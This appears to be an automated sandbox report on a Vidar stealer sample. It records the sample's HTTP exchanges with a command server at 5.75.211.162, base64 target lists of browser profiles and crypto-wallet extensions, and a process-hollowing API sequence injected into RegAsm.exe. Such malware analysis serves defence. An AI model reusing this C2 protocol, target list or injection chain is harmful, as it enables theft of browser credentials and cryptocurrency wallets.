                                                              Data Ascii: ------CBFCBKKFBAEHJKEBKFCBContent-Disposition: form-data; name="hwid"F9BC609879372827686991-a33c7340-61ca------CBFCBKKFBAEHJKEBKFCBContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------CBFCBKKFBAEHJKEBKFCB--
                                                              2024-09-26 17:49:34 UTC158INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Thu, 26 Sep 2024 17:49:34 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              2024-09-26 17:49:34 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 66 36 62 35 61 37 35 30 37 38 62 35 33 61 65 61 65 34 32 35 33 36 66 61 36 61 32 35 33 31 35 34 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 3a1|1|1|1|f6b5a75078b53aeae42536fa6a253154|1|1|1|0|0|50000|10


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.4497425.75.211.1624435676C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-26 17:49:34 UTC277OUTPOST / HTTP/1.1
                                                              Content-Type: multipart/form-data; boundary=----AEBAFBGIDHCBFHIECFCB
                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                              Host: 5.75.211.162
                                                              Content-Length: 331
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-09-26 17:49:34 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 62 35 61 37 35 30 37 38 62 35 33 61 65 61 65 34 32 35 33 36 66 61 36 61 32 35 33 31 35 34 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74
                                                              Data Ascii: ------AEBAFBGIDHCBFHIECFCBContent-Disposition: form-data; name="token"f6b5a75078b53aeae42536fa6a253154------AEBAFBGIDHCBFHIECFCBContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------AEBAFBGIDHCBFHIECFCBCont
                                                              2024-09-26 17:49:35 UTC158INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Thu, 26 Sep 2024 17:49:35 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              2024-09-26 17:49:35 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                              Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.4497435.75.211.1624435676C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-26 17:49:36 UTC277OUTPOST / HTTP/1.1
                                                              Content-Type: multipart/form-data; boundary=----GIIIIJDHJEGIECBGHIJE
                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                              Host: 5.75.211.162
                                                              Content-Length: 331
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-09-26 17:49:36 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 49 49 4a 44 48 4a 45 47 49 45 43 42 47 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 62 35 61 37 35 30 37 38 62 35 33 61 65 61 65 34 32 35 33 36 66 61 36 61 32 35 33 31 35 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 49 4a 44 48 4a 45 47 49 45 43 42 47 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 49 4a 44 48 4a 45 47 49 45 43 42 47 48 49 4a 45 0d 0a 43 6f 6e 74
                                                              Data Ascii: ------GIIIIJDHJEGIECBGHIJEContent-Disposition: form-data; name="token"f6b5a75078b53aeae42536fa6a253154------GIIIIJDHJEGIECBGHIJEContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------GIIIIJDHJEGIECBGHIJECont
                                                              2024-09-26 17:49:37 UTC158INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Thu, 26 Sep 2024 17:49:37 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              2024-09-26 17:49:37 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                              Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.4497445.75.211.1624435676C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-26 17:49:38 UTC277OUTPOST / HTTP/1.1
                                                              Content-Type: multipart/form-data; boundary=----DAFCAAEGDBKJJKECBKFH
                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                              Host: 5.75.211.162
                                                              Content-Length: 332
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-09-26 17:49:38 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 62 35 61 37 35 30 37 38 62 35 33 61 65 61 65 34 32 35 33 36 66 61 36 61 32 35 33 31 35 34 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 0d 0a 43 6f 6e 74
                                                              Data Ascii: ------DAFCAAEGDBKJJKECBKFHContent-Disposition: form-data; name="token"f6b5a75078b53aeae42536fa6a253154------DAFCAAEGDBKJJKECBKFHContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------DAFCAAEGDBKJJKECBKFHCont
                                                              2024-09-26 17:49:39 UTC158INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Thu, 26 Sep 2024 17:49:38 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              2024-09-26 17:49:39 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to dive into process behavior distribution

                                                              Click to jump to process

                                                              Target ID:0
                                                              Start time:13:49:09
                                                              Start date:26/09/2024
                                                              Path:C:\Users\user\Desktop\file.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                              Imagebase:0x90000
                                                              File size:413'224 bytes
                                                              MD5 hash:4453D7BC66E29C48ED6495BFA820E5B5
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:1
                                                              Start time:13:49:09
                                                              Start date:26/09/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:2
                                                              Start time:13:49:09
                                                              Start date:26/09/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                              Imagebase:0xf0000
                                                              File size:65'440 bytes
                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:3
                                                              Start time:13:49:09
                                                              Start date:26/09/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                              Imagebase:0x7b0000
                                                              File size:65'440 bytes
                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:9
                                                              Start time:13:49:38
                                                              Start date:26/09/2024
                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5676 -s 2188
                                                              Imagebase:0x7ff72bec0000
                                                              File size:483'680 bytes
                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:36.5%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:29.6%
                                                                Total number of Nodes:27
                                                                Total number of Limit Nodes:1
                                                                execution_graph 478 23d212d 481 23d2165 478->481 479 23d2273 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 480 23d2342 WriteProcessMemory 479->480 479->481 482 23d2387 480->482 481->479 483 23d2332 TerminateProcess 481->483 484 23d238c WriteProcessMemory 482->484 485 23d23c9 WriteProcessMemory Wow64SetThreadContext ResumeThread 482->485 483->479 484->482 486 2330988 487 233099e 486->487 488 2330abb 487->488 492 23312e1 487->492 497 2331218 487->497 501 2331220 487->501 493 23312e7 492->493 494 2331286 VirtualProtectEx 492->494 493->488 496 23312af 494->496 496->488 498 233126b VirtualProtectEx 497->498 500 23312af 498->500 500->488 502 233126b VirtualProtectEx 501->502 504 23312af 502->504 504->488 505 2330978 506 233099e 505->506 507 2330abb 506->507 508 23312e1 VirtualProtectEx 506->508 509 2331220 VirtualProtectEx 506->509 510 2331218 VirtualProtectEx 506->510 508->507 509->507 510->507

                                                                Callgraph

                                                                • Executed
                                                                • Not Executed
                                                                • Opacity -> Relevance
                                                                • Disassembly available
                                                                callgraph 0 Function_023300B0 1 Function_02330BB0 2 Function_02330234 3 Function_023301B4 4 Function_02330534 49 Function_02330260 4->49 5 Function_023304B9 6 Function_023304BD 7 Function_023300BC 8 Function_0233013C 9 Function_023D212D 10 Function_023300A0 11 Function_02331220 12 Function_023310A5 12->49 13 Function_02330224 14 Function_02330B2A 15 Function_02330528 15->49 16 Function_023301A8 17 Function_0233012C 18 Function_02330090 19 Function_02330214 20 Function_02330198 21 Function_02331218 22 Function_023D1D13 23 Function_0233051C 24 Function_0233011C 25 Function_02330100 26 Function_02330080 27 Function_02330988 27->4 27->11 27->14 27->15 27->21 27->23 47 Function_023312E1 27->47 71 Function_02330C40 27->71 72 Function_02330540 27->72 28 Function_02330188 29 Function_02330208 30 Function_023D1F86 31 Function_0233048F 32 Function_0233010C 33 Function_02330471 34 Function_023304F1 35 Function_02330070 36 Function_023300F0 37 Function_02330270 38 Function_02330475 39 Function_023304F5 40 Function_02330479 41 Function_023304F9 42 Function_02330178 43 Function_023301F8 44 Function_02330978 44->4 44->11 44->14 44->15 44->21 44->23 44->47 44->71 44->72 45 Function_02330AF8 45->14 46 Function_02330461 48 Function_02330060 50 Function_02330165 51 Function_023301E5 52 Function_02330465 53 Function_023300E4 54 Function_02330469 55 Function_023308E8 56 Function_0233046D 57 Function_02330551 58 Function_02330450 59 Function_023304D7 60 Function_02331056 61 Function_023301D5 62 Function_02330555 63 Function_02330154 64 Function_023300D4 65 Function_02330254 66 Function_02330559 67 Function_023308D8 68 Function_0233045D 69 Function_0233105C 69->49 70 Function_023304C1 71->49 73 Function_023301C0 74 Function_023311C6 75 Function_02330244 76 Function_02330444 77 Function_02330148 78 Function_023300C8 79 Function_02330848 80 Function_0233004D 81 Function_0233054D 82 Function_023311CC 82->49

                                                                Control-flow Graph

                                                                APIs
                                                                • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,023D209F,023D208F), ref: 023D229C
                                                                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 023D22AF
                                                                • Wow64GetThreadContext.KERNEL32(0000008C,00000000), ref: 023D22CD
                                                                • ReadProcessMemory.KERNELBASE(00000088,?,023D20E3,00000004,00000000), ref: 023D22F1
                                                                • VirtualAllocEx.KERNELBASE(00000088,?,?,00003000,00000040), ref: 023D231C
                                                                • TerminateProcess.KERNELBASE(00000088,00000000), ref: 023D233B
                                                                • WriteProcessMemory.KERNELBASE(00000088,00000000,?,?,00000000,?), ref: 023D2374
                                                                • WriteProcessMemory.KERNELBASE(00000088,00400000,?,?,00000000,?,00000028), ref: 023D23BF
                                                                • WriteProcessMemory.KERNELBASE(00000088,-00000008,?,00000004,00000000), ref: 023D23FD
                                                                • Wow64SetThreadContext.KERNEL32(0000008C,023B0000), ref: 023D2439
                                                                • ResumeThread.KERNELBASE(0000008C), ref: 023D2448
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1773878168.00000000023D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D1000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_23d1000_file.jbxd
                                                                Similarity
                                                                • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                • API String ID: 2440066154-1257834847
                                                                • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                • Instruction ID: bd880d19965f6c64113b46f2d40a530e13c5825d88d2511e9bcfc7075c2b3005
                                                                • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                • Instruction Fuzzy Hash: ABB1E67664024AAFDB60CF68CC80BDA77A5FF88714F158524EA0CAB342D774FA418B94

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 52 2330c40-2330c9b 55 2330d07-2330d15 52->55 56 2330c9d-2330cb6 52->56 57 2330da4-2330db7 55->57 58 2330d1b 55->58 66 2330f0d-2330f87 56->66 70 2330cbc-2330cdd 56->70 60 2330f03-2330f0a 57->60 61 2330dbd-2330dc6 57->61 62 2330d1e-2330d23 58->62 63 2330dc8-2330dce 61->63 64 2330dcf-2330dda 61->64 65 2330d29-2330d39 62->65 62->66 63->64 64->66 68 2330de0-2330dec 64->68 65->66 69 2330d3f-2330d4b 65->69 81 2330fdb-2331027 66->81 82 2330f89-2330fae 66->82 71 2330df5-2330dfc 68->71 72 2330dee-2330df4 68->72 74 2330d54-2330d5b 69->74 75 2330d4d-2330d53 69->75 70->66 76 2330ce3-2330cf1 70->76 71->66 78 2330e02-2330e0c 71->78 72->71 74->66 79 2330d61-2330d6b 74->79 75->74 76->66 80 2330cf7-2330d05 76->80 78->66 83 2330e12-2330e1c 78->83 79->66 84 2330d71-2330d7b 79->84 80->55 80->56 98 2331030-2331068 81->98 99 2331029-233102f 81->99 82->81 91 2330fb0-2330fb2 82->91 83->66 85 2330e22-2330e28 83->85 84->66 86 2330d81-2330d87 84->86 85->66 90 2330e2e-2330e3a 85->90 86->66 87 2330d8d-2330d9e 86->87 87->57 87->62 90->66 92 2330e40-2330e51 90->92 94 2330fd5-2330fd8 91->94 95 2330fb4-2330fbe 91->95 96 2330e53-2330e59 92->96 97 2330e5a-2330eb4 92->97 94->81 100 2330fc2-2330fd1 95->100 101 2330fc0 95->101 96->97 117 2330eb6-2330ec0 97->117 118 2330ee5-2330eea 97->118 108 233106a-233106e 98->108 109 2331078 98->109 99->98 100->100 103 2330fd3 100->103 101->100 103->94 108->109 111 2331070-2331073 call 2330260 108->111 112 2331079 109->112 111->109 112->112 117->118 119 2330ec2-2330eda 117->119 122 2330ef1-2330efd 118->122 119->118 121 2330edc-2330ee3 119->121 121->122 122->60 122->61
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1773785601.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2330000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @O8E$@O8E
                                                                • API String ID: 0-3380979170
                                                                • Opcode ID: d5a38ee0522d1c094996b815e6cfd06f16c7e558f4c7d81e15b22d94e7f9c6ef
                                                                • Instruction ID: 9bc1591dbcbf786122ce9eda27deedc002eb5cd70929d4dadf4e2ba0a515c022
                                                                • Opcode Fuzzy Hash: d5a38ee0522d1c094996b815e6cfd06f16c7e558f4c7d81e15b22d94e7f9c6ef
                                                                • Instruction Fuzzy Hash: 3DD1AD70A142589FCB1ACFA8C9807EDFBF2BF48314F248569E455E7256C734AE41CBA4

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 22 23312e1-23312e5 23 23312e7-233133a 22->23 24 2331286-2331288 22->24 30 2331346-233137b 23->30 31 233133c-2331344 23->31 25 233128a-233129c 24->25 26 233129e-23312ad VirtualProtectEx 24->26 25->26 27 23312b4-23312d5 26->27 28 23312af 26->28 28->27 34 2331384-2331398 30->34 35 233137d-2331383 30->35 31->30 35->34
                                                                APIs
                                                                • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 023312A0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1773785601.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2330000_file.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID: @O8E
                                                                • API String ID: 544645111-3502195768
                                                                • Opcode ID: ac40df4584c455af476b38d66c93af66f571f2b038669059487fb58baa20e749
                                                                • Instruction ID: 5b853d007ceeab46a51e3f9c724abee20f005b4a6308a21a71404ceec09fe9d2
                                                                • Opcode Fuzzy Hash: ac40df4584c455af476b38d66c93af66f571f2b038669059487fb58baa20e749
                                                                • Instruction Fuzzy Hash: AE3142B29002588FCF11CFA9D884BDEBBF0AF49324F14805AE848AB261C7749944CFA1

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 38 2331218-23312ad VirtualProtectEx 41 23312b4-23312d5 38->41 42 23312af 38->42 42->41
                                                                APIs
                                                                • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 023312A0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1773785601.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2330000_file.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID: @O8E
                                                                • API String ID: 544645111-3502195768
                                                                • Opcode ID: e63957868e1b4fa4c1bdf20cd7f4e4f1b7a64d782cf4a9c26121b66d6dcded04
                                                                • Instruction ID: 4c8f34d92a501e2337c080ca376c6f6ddbbc7998ee85917a6b5b0427281d95f8
                                                                • Opcode Fuzzy Hash: e63957868e1b4fa4c1bdf20cd7f4e4f1b7a64d782cf4a9c26121b66d6dcded04
                                                                • Instruction Fuzzy Hash: 022102B59002599FCB10DFAAD980AEEFBF0FF48314F10852EE959A7250C7749954CFA1

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 45 2331220-23312ad VirtualProtectEx 48 23312b4-23312d5 45->48 49 23312af 45->49 49->48
                                                                APIs
                                                                • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 023312A0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1773785601.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2330000_file.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID: @O8E
                                                                • API String ID: 544645111-3502195768
                                                                • Opcode ID: f8861fd40c8990b60da6aa265afeeb99821bd324f5e6557fda2a6b32afbdf23c
                                                                • Instruction ID: d95c8f648576f9abb20dd7cf7ccfed5d5b6eee13600977ab27e3c92c226129d1
                                                                • Opcode Fuzzy Hash: f8861fd40c8990b60da6aa265afeeb99821bd324f5e6557fda2a6b32afbdf23c
                                                                • Instruction Fuzzy Hash: 182110B19002599FCB10DFAAD980ADEFBF4FF48314F10842AE959A7250CB74A944CFA5

                                                                Execution Graph

                                                                Execution Coverage:13.9%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:5.5%
                                                                Total number of Nodes:1153
                                                                Total number of Limit Nodes:29
                                                                execution_graph 21560 4184ae 21561 4184b0 21560->21561 21612 402b68 21561->21612 21570 401284 25 API calls 21571 4184df 21570->21571 21572 401284 25 API calls 21571->21572 21573 4184e9 21572->21573 21716 40148a GetPEB 21573->21716 21575 4184f3 21576 401284 25 API calls 21575->21576 21577 4184fd 21576->21577 21578 401284 25 API calls 21577->21578 21579 418507 21578->21579 21580 401284 25 API calls 21579->21580 21581 418511 21580->21581 21717 4014a2 GetPEB 21581->21717 21583 41851b 21584 401284 25 API calls 21583->21584 21585 418525 21584->21585 21586 401284 25 API calls 21585->21586 21587 41852f 21586->21587 21588 401284 25 API calls 21587->21588 21589 418539 21588->21589 21718 4014f9 21589->21718 21592 401284 25 API calls 21593 41854d 21592->21593 21594 401284 25 API calls 21593->21594 21595 418557 21594->21595 21596 401284 25 API calls 21595->21596 21597 418561 21596->21597 21741 401666 GetTempPathW 21597->21741 21600 401284 25 API calls 21601 418570 21600->21601 21602 401284 25 API calls 21601->21602 21603 41857a 21602->21603 21604 401284 25 API calls 21603->21604 21605 418584 21604->21605 21753 417041 21605->21753 21608 41858f 21609 417041 305 API calls 21609->21608 21860 4047e8 GetProcessHeap HeapAlloc 21612->21860 21615 4047e8 3 API calls 21616 402b93 21615->21616 21617 4047e8 3 API calls 21616->21617 21618 402bac 21617->21618 21619 4047e8 3 API calls 21618->21619 21620 402bc3 